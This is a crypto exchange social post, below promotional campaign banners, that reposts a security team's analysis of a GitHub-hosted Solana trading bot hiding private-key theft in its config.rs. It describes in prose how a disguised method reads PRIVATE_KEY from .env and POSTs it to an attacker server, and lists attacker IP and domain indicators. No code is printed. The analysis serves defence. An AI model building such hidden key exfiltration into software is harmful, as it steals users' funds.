- Topic1/3
12k Popularity
20k Popularity
14k Popularity
52k Popularity
20k Popularity
- Pin
- 📢 Gate Square #Creator Campaign Phase 2# is officially live!
Join the ZKWASM event series, share your insights, and win a share of 4,000 $ZKWASM!
As a pioneer in zk-based public chains, ZKWASM is now being prominently promoted on the Gate platform!
Three major campaigns are launching simultaneously: Launchpool subscription, CandyDrop airdrop, and Alpha exclusive trading — don’t miss out!
🎨 Campaign 1: Post on Gate Square and win content rewards
📅 Time: July 25, 22:00 – July 29, 22:00 (UTC+8)
📌 How to participate:
Post original content (at least 100 words) on Gate Square related to
- 📢 Gate Square #MBG Posting Challenge# is Live— Post for MBG Rewards!
Want a share of 1,000 MBG? Get involved now—show your insights and real participation to become an MBG promoter!
💰 20 top posts will each win 50 MBG!
How to Participate:
1️⃣ Research the MBG project
Share your in-depth views on MBG’s fundamentals, community governance, development goals, and tokenomics, etc.
2️⃣ Join and share your real experience
Take part in MBG activities (CandyDrop, Launchpool, or spot trading), and post your screenshots, earnings, or step-by-step tutorials. Content can include profits, beginner-friendl
- 🎉 Gate Square’s "Spark Program" Surpasses 1,000 KOLs!
💥 The creator ecosystem is in full bloom!
📈 Get featured, earn rewards, and grow your influence—what are you waiting for?
💰 Cash incentives ✔️
🚀 Traffic support ✔️
👑 Exclusive verification ✔️
From 0 to 1,000 in just weeks—Gate Square is becoming the epicenter of Web3 content! ⚡
You’re not just posting content, but the next "viral opportunity"!
🌟 Join the Spark Program and kickstart your breakthrough!
👉 https://www.gate.com/announcements/article/45695
- 📢 #Gate Square Writing Contest Phase 3# is officially kicks off!
🎮 This round focuses on: Yooldo Games (ESPORTS)
✍️ Share your unique insights and join promotional interactions. To be eligible for any reward, you must also participate in Gate’s Phase 286 Launchpool, CandyDrop, or Alpha activities!
💡 Content creation + airdrop participation = double points. You could be the grand prize winner!
💰Total prize pool: 4,464 $ESPORTS
🏆 First Prize (1 winner): 964 tokens
🥈 Second Prize (5 winners): 400 tokens each
🥉 Third Prize (10 winners): 150 tokens each
🚀 How to participate:
1️⃣ Publish an
Malicious code reappears in the Solana ecosystem: GitHub project hides a private key theft trap.
Malicious Bots Resurface in Solana Ecosystem: Configuration Files Hide Private Key Leakage Traps
In early July 2025, a user sought help from the security team, requesting an analysis of the reason behind their stolen crypto assets. The investigation revealed that the incident stemmed from the user utilizing an open-source project hosted on GitHub, which triggered hidden coin theft activities.
Recently, more users have had their assets stolen due to using similar open-source projects and have contacted the security team. In response, the team conducted a further in-depth analysis of this attack method.
Analysis Process
Static Analysis
Through static analysis, suspicious code was found in the /src/common/config.rs configuration file, mainly concentrated in the create_coingecko_proxy() method. This method first calls import_wallet(), which in turn calls import_env_var() to obtain the Private Key.
The import_env_var( method is used to obtain the configuration information of environment variables from the .env file. If the environment variable does not exist, it will enter the error handling branch and continue to consume resources.
Sensitive information such as PRIVATE_KEY is stored in the .env file. After obtaining the private key using the import_wallet)( method, its length will be checked:
Subsequently, the malicious code encapsulates the Private Key information to support multithreaded sharing.
The create_coingecko_proxy)( method decodes malicious URL addresses after obtaining the Private Key. The decoded real address is:
Malicious code converts the Private Key into a Base58 string, constructs a JSON request body, and sends it to the above URL via a POST request, while ignoring the response result.
In addition, this method also includes normal functions such as obtaining prices to cover up malicious activities. The method name has also been disguised and is misleading.
The create_coingecko_proxy)( method is called when the application starts, located in the initialization phase of the main)( method in main.rs.
According to the analysis, the IP address of the server is located in the United States.
The project was updated on GitHub on July 17, 2025, with the main changes focused on the configuration file config.rs under the src directory. The encoding of the attacker's server address has been replaced with a new encoding.
![Malicious Bots Reappear in Solana Ecosystem: Profile Configuration Hides Private Key Leakage Trap])https://img-cdn.gateio.im/webp-social/moments-18e2e53ca3a5e4a8aa697fefe2d3dc09.webp(
) Dynamic Analysis
To intuitively observe the theft process, write a Python script to generate test Solana public and private key pairs, and set up an HTTP server on the server to receive POST requests.
Replace the encoded test server address generated with the encoded malicious server address set by the original attacker, and replace the private key in the .env file with the test private key.
After launching the malicious code, the test server successfully received the JSON data sent by the malicious project, which contains Private Key information.
![Malicious Bots Resurface in the Solana Ecosystem: Profile Contains Hidden Traps for Private Key Leakage]###https://img-cdn.gateio.im/webp-social/moments-1b9cc836d53854710f7ef3b8406e63ad.webp(
![Malicious Bots Resurface in the Solana Ecosystem: Configuration Files Hide Private Key Leakage Traps])https://img-cdn.gateio.im/webp-social/moments-64fa1620b6e02f9f0babadd4ae8038be.webp(
![Malicious Bots Resurface in the Solana Ecosystem: Configuration File Hides Private Key Leakage Trap])https://img-cdn.gateio.im/webp-social/moments-52dfae255e511bbb7a9813af7340c52e.webp(
![Solana ecosystem reappears malicious Bots: Configuration file hides Private Key leakage trap])https://img-cdn.gateio.im/webp-social/moments-453d878924f97e2f24033e4d40f0a24c.webp(
![Malicious Bots Resurface in the Solana Ecosystem: Profile Configuration Hides Private Key Leakage Trap])https://img-cdn.gateio.im/webp-social/moments-c092752ca8254c7c3dfa22bde91a954c.webp(
![Malicious Bots Reappear in the Solana Ecosystem: Profile Configuration Hides Private Key Leakage Trap])https://img-cdn.gateio.im/webp-social/moments-f0b9ae1a79eb6ac2579c9d5fb0f0fa78.webp(
![Malicious Bots Resurface in Solana Ecosystem: Profile Contains Private Key Leakage Trap])https://img-cdn.gateio.im/webp-social/moments-a6fc43e2f6cdc1c7f8ad2422b2746177.webp(
![Malicious Bots Resurface in the Solana Ecosystem: Configuration Files Hide Private Key Leakage Traps])https://img-cdn.gateio.im/webp-social/moments-64fca774c385631399844f160f2f10f6.webp(
![Malicious Bots Resurface in the Solana Ecosystem: Profile Configuration Hides Private Key Leakage Trap])https://img-cdn.gateio.im/webp-social/moments-7f864266a4358a6c8e9a79f81724e28b.webp(
![Malicious Bots Reappear in Solana Ecosystem: Configuration Files Hide Private Key Leakage Traps])https://img-cdn.gateio.im/webp-social/moments-9bdba50464383385bd886d9ef9bee815.webp(
![Malicious Bots Reappear in the Solana Ecosystem: Configuration Files Hide Private Key Leakage Trap])https://img-cdn.gateio.im/webp-social/moments-72fa652d772e8b9e2cf92ebb70beb665.webp(
![Malicious Bots Resurface in the Solana Ecosystem: Profile Configuration Hides Private Key Leakage Trap])https://img-cdn.gateio.im/webp-social/moments-cfefb15e6201f47f30b9dc4db76d81d3.webp(
![Malicious Bots Reappear in the Solana Ecosystem: Configuration Files Hide Private Key Leakage Trap])https://img-cdn.gateio.im/webp-social/moments-57ba4a644ebef290c283580a2167824f.webp(
![Malicious Bots Resurface in the Solana Ecosystem: Configuration Files Conceal Private Key Leakage Trap])https://img-cdn.gateio.im/webp-social/moments-2be2dd9eda6128199be4f95aa1cde0a7.webp(
![Malicious Bots Resurface in the Solana Ecosystem: Configuration Files Hide Private Key Leakage Trap])https://img-cdn.gateio.im/webp-social/moments-d37c144e4d0ea21d3d498ad94e543163.webp(
![Malicious Bots Resurface in the Solana Ecosystem: Configuration Files Hide Private Key Leakage Traps])https://img-cdn.gateio.im/webp-social/moments-68ecbf61d12fe93ff3064dd2e33b0a8c.webp(
![Malicious Bots Resurface in Solana Ecosystem: Profile Hidden Private Key Leakage Trap])https://img-cdn.gateio.im/webp-social/moments-6af3aa6c3c070effb3a6d1d986126ea3.webp(
![Malicious Bots Resurface in the Solana Ecosystem: Configuration Files Conceal Private Key Leakage Traps])https://img-cdn.gateio.im/webp-social/moments-a0148c7998bea12a4bcd48595652589a.webp(
![Malicious Bots Resurface in Solana Ecosystem: Profile Hides Private Key Leakage Trap])https://img-cdn.gateio.im/webp-social/moments-9869ded8451159c388daf8f18fab1522.webp(
Intrusion Indicators ) IoCs (
IP address:103.35.189.28
Domain:storebackend-qpq3.onrender.com
Malicious Repository:
Other repositories with similar implementation methods:
Summary
In this attack, the attacker disguised as a legitimate open-source project to lure users into downloading and executing malicious code. The project reads sensitive information from the local .env file and transmits the stolen Private Key to a server controlled by the attacker. This type of attack often combines social engineering techniques, and users can easily fall victim if they are not careful.
Developers are advised to remain highly vigilant towards unknown GitHub projects, especially when it involves wallet or Private Key operations. If running or debugging is necessary, it is recommended to do so in a separate environment that does not contain sensitive data, to avoid executing malicious programs and commands from unknown sources.